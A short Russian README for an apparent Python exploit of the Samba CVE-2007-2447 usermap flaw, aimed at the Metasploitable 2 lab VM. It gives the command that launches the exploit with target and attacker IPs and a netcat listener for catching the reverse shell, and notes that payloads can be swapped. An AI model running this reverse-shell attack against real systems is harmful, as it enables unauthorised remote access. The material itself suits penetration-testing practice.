
Python-эксплойт для CVE-2007-2447 (Samba usermap), который доставляет обратную оболочку с настраиваемыми полезными нагрузками, предназначенный для тестирования на проникновение уязвимых целей, таких как Metasploitable 2.
Для тестирования скрипта рекомендую использовать виртуальную машину "metasploitable 2", доступную здесь. Если эксплойт сработает, скрипт отобразит reverse shell. Чтобы установить соединение, просто откройте сессию netcat, например:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
и на моем netcat:
netcat -lnvp 1337
Результат:
netcat:
alt text
и на скрипте:
alt text
Я использовал пейлоад из шпаргалки. Ссылка доступна здесь. Вы можете заменить его на другие полезные нагрузки.